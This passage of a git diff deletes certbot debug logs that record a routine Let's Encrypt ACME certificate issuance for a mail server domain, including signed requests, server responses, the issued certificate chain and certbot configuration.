REQUEST-----\nMIIBKTCBsAIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEPKcT8XLoo1xwS02L\nEj00oFN88yCY0O8V/Tkd/0PtOcnyxb+ydE/KAoB2JpmRNnRxtA17Uqe1ZhFA/ehX\nYU3ZgdiDCzH1K8zOZUGKOnIWpsW50Z17xB9yobPvNlUWc/kKoDEwLwYJKoZIhvcN\nAQkOMSIwIDAeBgNVHREEFzAVghNtYWlsLmhhbm1vY25uLmNvLmtyMAoGCCqGSM49\nBAMCA2gAMGUCMQC9OAyPMN7sqWqGHxUDeGLkhlP3jiK8aODmOETTrBwWjReWYfNL\ndiye5QCa6C3lVHECMCIX/Hyk7gp4sCW+XOiTavmgA3ytDrSMpiIWQJfzzdcOH2zN\nzpUfaCYVlcFtuP6Znw==\n-----END CERTIFICATE REQUEST-----\n', form='pem') -2026-02-14 23:36:32,239:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2026-02-14 23:38:02.239703 -2026-02-14 23:36:32,240:DEBUG:acme.client:JWS payload: -b'{\n "csr": "MIIBKTCBsAIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEPKcT8XLoo1xwS02LEj00oFN88yCY0O8V_Tkd_0PtOcnyxb-ydE_KAoB2JpmRNnRxtA17Uqe1ZhFA_ehXYU3ZgdiDCzH1K8zOZUGKOnIWpsW50Z17xB9yobPvNlUWc_kKoDEwLwYJKoZIhvcNAQkOMSIwIDAeBgNVHREEFzAVghNtYWlsLmhhbm1vY25uLmNvLmtyMAoGCCqGSM49BAMCA2gAMGUCMQC9OAyPMN7sqWqGHxUDeGLkhlP3jiK8aODmOETTrBwWjReWYfNLdiye5QCa6C3lVHECMCIX_Hyk7gp4sCW-XOiTavmgA3ytDrSMpiIWQJfzzdcOH2zNzpUfaCYVlcFtuP6Znw"\n}' -2026-02-14 23:36:32,244:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480370643826: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0Zm1FdllrS193eEhLRjlSU2ZjVVVUMXdVenNBQjE3akNWaDlORHMzaWtnejAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzMwNjQzODY5MDYvNDgwMzcwNjQzODI2In0", - "signature": "mCOEYzA48NByNR5p9Wzi-z2S6cMNG1MrJLtSAERYgabKYzhCjGFjEuxZLUz1VOaNDQ_9ejz5805yd2A5o2aNEDPdhseTeXZrG3zNwGvZ4IKBN8aLjhJEygriH2SKFJZWssq8mhSeHVN_ICrE6YTq5ihsb6o2ihTmmRQqKVgnNlj8XoXgGQl4Nq8k7257awIxAkvm3iWK-QbuwSiJCU-9Mj9B2wuPxO2Sjc_rNNXtWsrFC3koQA7Z0rgF_UT-gtj5CfLMsxdaP5SY995QXv-O9lY9yYC40edSE1hbnWoW2nx04Uc3LJrZ2SfvbPtYgnIj0E5GRPK2ZSw2ZcyUDCnJ3w", - "payload": "ewogICJjc3IiOiAiTUlJQktUQ0JzQUlCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFUEtjVDhYTG9vMXh3UzAyTEVqMDBvRk44OHlDWTBPOFZfVGtkXzBQdE9jbnl4Yi15ZEVfS0FvQjJKcG1STm5SeHRBMTdVcWUxWmhGQV9laFhZVTNaZ2RpREN6SDFLOHpPWlVHS09uSVdwc1c1MFoxN3hCOXlvYlB2TmxVV2Nfa0tvREV3THdZSktvWklodmNOQVFrT01TSXdJREFlQmdOVkhSRUVGekFWZ2hOdFlXbHNMbWhoYm0xdlkyNXVMbU52TG10eU1Bb0dDQ3FHU000OUJBTUNBMmdBTUdVQ01RQzlPQXlQTU43c3FXcUdIeFVEZUdMa2hsUDNqaUs4YU9EbU9FVFRyQndXalJlV1lmTkxkaXllNVFDYTZDM2xWSEVDTUNJWF9IeWs3Z3A0c0NXLVhPaVRhdm1nQTN5dERyU01waUlXUUpmenpkY09IMnpOenBVZmFDWVZsY0Z0dVA2Wm53Igp9" -} -2026-02-14 23:36:37,057:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/3064386906/480370643826 HTTP/1.1" 200 455 -2026-02-14 23:36:37,057:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:36:36 GMT -Content-Type: application/json -Content-Length: 455 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480370643826 -Replay-Nonce: QkEzerAf0E6X65_9Bjtzue_QJCLFZEtmA7doUQlpM5e23i3Tlvk -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "status": "valid", - "expires": "2026-02-21T23:36:11Z", - "identifiers": [ - { - "type": "dns", - "value": "mail.hanmocnn.co.kr" - } - ], - "authorizations": [ - "https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136" - ], - "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480370643826", - "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/063858a485c0330250d6de712c329ff26fb5" -} -2026-02-14 23:36:37,058:DEBUG:acme.client:Storing nonce: QkEzerAf0E6X65_9Bjtzue_QJCLFZEtmA7doUQlpM5e23i3Tlvk -2026-02-14 23:36:38,059:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 23:36:38,063:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480370643826: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZjBFNlg2NV85Qmp0enVlX1FKQ0xGWkV0bUE3ZG9VUWxwTTVlMjNpM1RsdmsiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzMwNjQzODY5MDYvNDgwMzcwNjQzODI2In0", - "signature": "hi-_iTlLBN2nVItxQCfD5kxWh9EsOOdoYQSioZpkWKRAdRSr9L26fsb8sBkO0nf69jn5RI-11O26JA0u_w7LaaD1rCvR39tWDvdrsdIKuwxUZuxTU3sLu49y7XetmALVW6r-5do21DZAveY7ahzXmhpoG-WeY33B_2APSFlbg2fZ5dJQx_sF0i_o-OtksCgS06ODwWKP0THlc3dpcRfmn6AeKbYjBjduZCZn8WUtho6AcPy0WOVcZPtpl0HiL1aopYVgLpeGBZb0M31ixgVR8JPdCviemJ79a2tvxAIu56G55Zsxoi2hCcB0rfeQ0mCZRY2UKVCUE4qWbz2QpLVz1w", - "payload": "" -} -2026-02-14 23:36:38,242:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/3064386906/480370643826 HTTP/1.1" 200 455 -2026-02-14 23:36:38,243:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:36:38 GMT -Content-Type: application/json -Content-Length: 455 -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480370643826 -Replay-Nonce: qLPTsdtf3ueEzlTXv-ytiM5j2C-SVQBDR5QGMdth3ZWFi80T__o -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "status": "valid", - "expires": "2026-02-21T23:36:11Z", - "identifiers": [ - { - "type": "dns", - "value": "mail.hanmocnn.co.kr" - } - ], - "authorizations": [ - "https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136" - ], - "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480370643826", - "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/063858a485c0330250d6de712c329ff26fb5" -} -2026-02-14 23:36:38,243:DEBUG:acme.client:Storing nonce: qLPTsdtf3ueEzlTXv-ytiM5j2C-SVQBDR5QGMdth3ZWFi80T__o -2026-02-14 23:36:38,243:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 23:36:38,248:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/063858a485c0330250d6de712c329ff26fb5: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZjN1ZUV6bFRYdi15dGlNNWoyQy1TVlFCRFI1UUdNZHRoM1pXRmk4MFRfX28iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDYzODU4YTQ4NWMwMzMwMjUwZDZkZTcxMmMzMjlmZjI2ZmI1In0", - "signature": "HTPcXpLVCGVP99416PBRlLwqk7JxPjp_WfRZcgJLPm1b-I71C96O4KR4lAxaO2TyIm39enpeHHDXCq8cO41ypoQwPT4qTVokDhMuO-rwwn1w1gih6YzR-erFCaqLBxMg_YsoEoSjTnfQ9SDhou8wPNur-fAAoHmXVoed8g7ZapbGjSikBkYX7YbVOkbstmFiV8Df_UgGB6Xm5-lVUnJ69p0eEu1-e4qyonFETOJ0kWjetMsdNtud9J6asRxnJas-ZbcR4rpcmRr-yiT6D-hwFfLIeNkZHEJGAn1E1g-uW3NPeAZdHh5aJ9wbykM5QfL1fIkhK7FCJTKKgdUSwoYwcg", - "payload": "" -} -2026-02-14 23:36:38,427:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/063858a485c0330250d6de712c329ff26fb5 HTTP/1.1" 200 2893 -2026-02-14 23:36:38,428:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:36:38 GMT -Content-Type: application/pem-certificate-chain -Content-Length: 2893 -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index", ;rel="alternate" -Replay-Nonce: QkEzerAfvHenr9WRgSYKed7x868snGGgTeqk_BsqTqY3LnG8q7c -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - ------BEGIN CERTIFICATE----- -MIIDpTCCAyugAwIBAgISBjhYpIXAMwJQ1t5xLDKf8m+1MAoGCCqGSM49BAMDMDIx -CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF -ODAeFw0yNjAyMTQyMjM4MDJaFw0yNjA1MTUyMjM4MDFaMB4xHDAaBgNVBAMTE21h -aWwuaGFubW9jbm4uY28ua3IwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAAQ8pxPxcuij -XHBLTYsSPTSgU3zzIJjQ7xX9OR3/Q+05yfLFv7J0T8oCgHYmmZE2dHG0DXtSp7Vm -EUD96FdhTdmB2IMLMfUrzM5lQYo6chamxbnRnXvEH3Khs+82VRZz+QqjggIWMIIC -EjAOBgNVHQ8BAf8EBAMCB4AwEwYDVR0lBAwwCgYIKwYBBQUHAwEwDAYDVR0TAQH/ -BAIwADAdBgNVHQ4EFgQU5Yj9WqUvf/9B0wtxhkCGx9UUkvgwHwYDVR0jBBgwFoAU -jw0TovYuftFQbDMYOF1ZjiNykcowMgYIKwYBBQUHAQEEJjAkMCIGCCsGAQUFBzAC -hhZodHRwOi8vZTguaS5sZW5jci5vcmcvMB4GA1UdEQQXMBWCE21haWwuaGFubW9j -bm4uY28ua3IwEwYDVR0gBAwwCjAIBgZngQwBAgEwLQYDVR0fBCYwJDAioCCgHoYc -aHR0cDovL2U4LmMubGVuY3Iub3JnLzU0LmNybDCCAQMGCisGAQQB1nkCBAIEgfQE -gfEA7wB1AJaXZL9VWJet90OHaDcIQnfp8DrV9qTzNm5GpD8PyqnGAAABnF6DWw8A -AAQDAEYwRAIgFec+y9jrM6c9Lf3vNDFYxydQLd2FfYCWPsTKF7uKHKgCIEz1X+xq -LnqvKjoLhm/BC0lTehEdcDEoHAtcHbr9XubUAHYAZBHEbKQS7KeJHKICLgC8q08o -B9QeNSer6v7VA8l9zfAAAAGcXoNqZgAABAMARzBFAiBypKO0gNsH/Fqd4jK8Z9YJ -5gWAE+eEoxhkeKF9n1GF2AIhAMlIUgwLKtsj2UdZ6qWWp0Ew6L0mMg8E72tV0rn2 -TuYyMAoGCCqGSM49BAMDA2gAMGUCMDPRlyHa6dwh8HioZ/du2eihye/hY9f3zuEU -1YDjNsVO3yMkkr0MgFkBzbFO/lQDeAIxAKQ36q4cNqNwYrOd2gsuXczOpUEAeoUJ -A0miZddVRI/uTm5o0sYlEABAQ5jE3I56Gw== ------END CERTIFICATE----- - ------BEGIN CERTIFICATE----- -MIIEVjCCAj6gAwIBAgIQY5WTY8JOcIJxWRi/w9ftVjANBgkqhkiG9w0BAQsFADBP -MQswCQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFy -Y2ggR3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMTAeFw0yNDAzMTMwMDAwMDBa -Fw0yNzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBF -bmNyeXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7c -S7QMApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHb -R6EToMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB -9TAOBgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMB -MBIGA1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4j -cpHKMB8GA1UdIwQYMBaAFHm0WeZ7tuXkAXOACIjIGlj26ZtuMDIGCCsGAQUFBwEB -BCYwJDAiBggrBgEFBQcwAoYWaHR0cDovL3gxLmkubGVuY3Iub3JnLzATBgNVHSAE -DDAKMAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDEuYy5sZW5j -ci5vcmcvMA0GCSqGSIb3DQEBCwUAA4ICAQBnE0hGINKsCYWi0Xx1ygxD5qihEjZ0 -RI3tTZz1wuATH3ZwYPIp97kWEayanD1j0cDhIYzy4CkDo2jB8D5t0a6zZWzlr98d -AQFNh8uKJkIHdLShy+nUyeZxc5bNeMp1Lu0gSzE4McqfmNMvIpeiwWSYO9w82Ob8 -otvXcO2JUYi3svHIWRm3+707DUbL51XMcY2iZdlCq4Wa9nbuk3WTU4gr6LY8MzVA -aDQG2+4U3eJ6qUF10bBnR1uuVyDYs9RhrwucRVnfuDj29CMLTsplM5f5wSV5hUpm -Uwp/vV7M4w4aGunt74koX71n4EdagCsL/Yk5+mAQU0+tue0JOfAV/R6t1k+Xk9s2 -HMQFeoxppfzAVC04FdG9M+AC2JWxmFSt6BCuh3CEey3fE52Qrj9YM75rtvIjsm/1 -Hl+u//Wqxnu1ZQ4jpa+VpuZiGOlWrqSP9eogdOhCGisnyewWJwRQOqK16wiGyZeR -xs/Bekw65vwSIaVkBruPiTfMOo0Zh4gVa8/qJgMbJbyrwwG97z/PRgmLKCDl8z3d -tA0Z7qq7fta0Gl24uyuB05dqI5J1LvAzKuWdIjT1tP8qCoxSE/xpix8hX2dt3h+/ -jujUgFPFZ0EVZ0xSyBNRF3MboGZnYXFUxpNjTWPKpagDHJQmqrAcDmWJnMsFY3jS -u1igv3OefnWjSQ== ------END CERTIFICATE----- - -2026-02-14 23:36:38,442:DEBUG:acme.client:Storing nonce: QkEzerAfvHenr9WRgSYKed7x868snGGgTeqk_BsqTqY3LnG8q7c -2026-02-14 23:36:38,442:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 23:36:38,446:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/063858a485c0330250d6de712c329ff26fb5/1: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZnZIZW5yOVdSZ1NZS2VkN3g4NjhzbkdHZ1RlcWtfQnNxVHFZM0xuRzhxN2MiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDYzODU4YTQ4NWMwMzMwMjUwZDZkZTcxMmMzMjlmZjI2ZmI1LzEifQ", - "signature": "X591XvnI02Agc3dUrxh3hTWlQ9gCVRZHBEs_5TIIqzRqx8dyj71RKnji0CdkxPE4JpPcAkJaixeiQau1uTqSpHs6ixfDPPrfDzNcLJlkyOXBdipNCuDD63tV3OPlcYEDdQXgUHQfikEjwWum2tHSzhvRX1szGkyq0UUGu_RM7JrrGe5e1l0wYhr_5c12dj0gA7V6L3sRTIHb9UpcO8p9_fszUSz5I7MZpP0grjXzqHiH9x5K2h_EQ8LvtPKe9CO85eX1ZufvZj-Np1cEyQOoNQf5dqxbXhNnwBMzAiJEv-XJvlqpGm-00pVcpSvTQqED_P0e2i3NhYPQZb91idGo9A", - "payload": "" -} -2026-02-14 23:36:38,624:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/063858a485c0330250d6de712c329ff26fb5/1 HTTP/1.1" 200 2328 -2026-02-14 23:36:38,625:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:36:38 GMT -Content-Type: application/pem-certificate-chain -Content-Length: 2328 -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index", ;rel="alternate" -Replay-Nonce: qLPTsdtfmv85WZpKILu_umBFIIsvcuyW1Y0hi5WT9olFTo9SIAY -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - ------BEGIN CERTIFICATE----- -MIIDpTCCAyugAwIBAgISBjhYpIXAMwJQ1t5xLDKf8m+1MAoGCCqGSM49BAMDMDIx -CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF -ODAeFw0yNjAyMTQyMjM4MDJaFw0yNjA1MTUyMjM4MDFaMB4xHDAaBgNVBAMTE21h -aWwuaGFubW9jbm4uY28ua3IwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAAQ8pxPxcuij -XHBLTYsSPTSgU3zzIJjQ7xX9OR3/Q+05yfLFv7J0T8oCgHYmmZE2dHG0DXtSp7Vm -EUD96FdhTdmB2IMLMfUrzM5lQYo6chamxbnRnXvEH3Khs+82VRZz+QqjggIWMIIC -EjAOBgNVHQ8BAf8EBAMCB4AwEwYDVR0lBAwwCgYIKwYBBQUHAwEwDAYDVR0TAQH/ -BAIwADAdBgNVHQ4EFgQU5Yj9WqUvf/9B0wtxhkCGx9UUkvgwHwYDVR0jBBgwFoAU -jw0TovYuftFQbDMYOF1ZjiNykcowMgYIKwYBBQUHAQEEJjAkMCIGCCsGAQUFBzAC -hhZodHRwOi8vZTguaS5sZW5jci5vcmcvMB4GA1UdEQQXMBWCE21haWwuaGFubW9j -bm4uY28ua3IwEwYDVR0gBAwwCjAIBgZngQwBAgEwLQYDVR0fBCYwJDAioCCgHoYc -aHR0cDovL2U4LmMubGVuY3Iub3JnLzU0LmNybDCCAQMGCisGAQQB1nkCBAIEgfQE -gfEA7wB1AJaXZL9VWJet90OHaDcIQnfp8DrV9qTzNm5GpD8PyqnGAAABnF6DWw8A -AAQDAEYwRAIgFec+y9jrM6c9Lf3vNDFYxydQLd2FfYCWPsTKF7uKHKgCIEz1X+xq -LnqvKjoLhm/BC0lTehEdcDEoHAtcHbr9XubUAHYAZBHEbKQS7KeJHKICLgC8q08o -B9QeNSer6v7VA8l9zfAAAAGcXoNqZgAABAMARzBFAiBypKO0gNsH/Fqd4jK8Z9YJ -5gWAE+eEoxhkeKF9n1GF2AIhAMlIUgwLKtsj2UdZ6qWWp0Ew6L0mMg8E72tV0rn2 -TuYyMAoGCCqGSM49BAMDA2gAMGUCMDPRlyHa6dwh8HioZ/du2eihye/hY9f3zuEU -1YDjNsVO3yMkkr0MgFkBzbFO/lQDeAIxAKQ36q4cNqNwYrOd2gsuXczOpUEAeoUJ -A0miZddVRI/uTm5o0sYlEABAQ5jE3I56Gw== ------END CERTIFICATE----- - ------BEGIN CERTIFICATE----- -MIICtTCCAjugAwIBAgIQfo8UX4exWTMtf9QIK4JraTAKBggqhkjOPQQDAzBPMQsw -CQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFyY2gg -R3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMjAeFw0yNDAzMTMwMDAwMDBaFw0y -NzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNy -eXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7cS7QM -ApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHbR6ET -oMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB9TAO -BgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMBIG -A1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4jcpHK -MB8GA1UdIwQYMBaAFHxClq7eS0g7+pL4nozPbYupcjeVMDIGCCsGAQUFBwEBBCYw -JDAiBggrBgEFBQcwAoYWaHR0cDovL3gyLmkubGVuY3Iub3JnLzATBgNVHSAEDDAK -MAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDIuYy5sZW5jci5v -cmcvMAoGCCqGSM49BAMDA2gAMGUCMQClsUNJdX36GE+o2yDf7L02m3P3ElVWRLls -5ZyLYPjcNamBxRB9gZYoj24mGZtP3GkCMASZcALg6kpScomqIIjVHXRUQ500cdl4 -4n7fhxwokLo/lVlO8YyHwAi7ejTHtvw9Vg== ------END CERTIFICATE----- - -2026-02-14 23:36:38,625:DEBUG:acme.client:Storing nonce: qLPTsdtfmv85WZpKILu_umBFIIsvcuyW1Y0hi5WT9olFTo9SIAY -2026-02-14 23:36:38,626:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager -2026-02-14 23:36:38,627:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-4. -2026-02-14 23:36:38,627:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-4. -2026-02-14 23:36:38,628:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-4/cert.pem. -2026-02-14 23:36:38,628:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-4/privkey.pem. -2026-02-14 23:36:38,628:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-4/chain.pem. -2026-02-14 23:36:38,628:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-4/fullchain.pem. -2026-02-14 23:36:38,628:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-4/README. -2026-02-14 23:36:38,639:DEBUG:certbot.configuration:Var account=ce2ddac5740bb12d4d6591b7fa1728af (set by user). -2026-02-14 23:36:38,639:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user). -2026-02-14 23:36:38,639:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user). -2026-02-14 23:36:38,639:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user). -2026-02-14 23:36:38,639:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user). -2026-02-14 23:36:38,640:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user). -2026-02-14 23:36:38,640:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user). -2026-02-14 23:36:38,640:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user). -2026-02-14 23:36:38,640:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None -2026-02-14 23:36:38,640:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None -2026-02-14 23:36:38,640:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user). -2026-02-14 23:36:38,640:DEBUG:certbot.configuration:Var webroot_map={'mail.hanmocnn.co.kr': '/data/letsencrypt-acme-challenge'} (set by user). -2026-02-14 23:36:38,642:DEBUG:certbot._internal.display.obj:Notifying user: -Successfully received certificate. -Certificate is saved at: /etc/letsencrypt/live/npm-4/fullchain.pem -Key is saved at: /etc/letsencrypt/live/npm-4/privkey.pem -This certificate expires on 2026-05-15. -These files will be updated when the certificate renews. -2026-02-14 23:36:38,642:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS: -2026-02-14 23:36:38,643:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions. -2026-02-14 23:36:38,646:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by: - * Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate - * Donating to EFF: https://eff.org/donate-le diff --git a/npm/data/logs/letsencrypt.log.4 b/npm/data/logs/letsencrypt.log.4 deleted file mode 100644 index a357cf6..0000000 --- a/npm/data/logs/letsencrypt.log.4 +++ /dev/null @@ -1,361 +0,0 @@ -2026-02-14 23:30:10,216:DEBUG:certbot._internal.main:certbot version: 5.3.0 -2026-02-14 23:30:10,217:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot -2026-02-14 23:30:10,217:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-3', '--agree-tos', '--authenticator', 'webroot', '-m', 'windpacer@hanmocnn.co.kr', '--preferred-challenges', 'http', '--domains', 'mail.hanmocnn.co.kr'] -2026-02-14 23:30:10,217:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) -2026-02-14 23:30:10,231:DEBUG:certbot._internal.log:Root logging level set at 30 -2026-02-14 23:30:10,232:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None -2026-02-14 23:30:10,232:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot -Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). -Interfaces: Authenticator, Plugin -Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') -Initialized: -Prep: True -2026-02-14 23:30:10,233:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None -2026-02-14 23:30:10,233:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None -2026-02-14 23:30:10,466:DEBUG:certbot._internal.main:Picked account: -2026-02-14 23:30:10,467:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. -2026-02-14 23:30:10,469:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 -2026-02-14 23:30:11,033:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 -2026-02-14 23:30:11,033:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:30:10 GMT -Content-Type: application/json -Content-Length: 1033 -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "IeJ13iSSbJU": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", - "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", - "meta": { - "caaIdentities": [ - "letsencrypt.org" - ], - "profiles": { - "classic": "https://letsencrypt.org/docs/profiles#classic", - "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", - "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", - "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" - }, - "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", - "website": "https://letsencrypt.org" - }, - "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", - "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", - "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", - "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", - "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" -} -2026-02-14 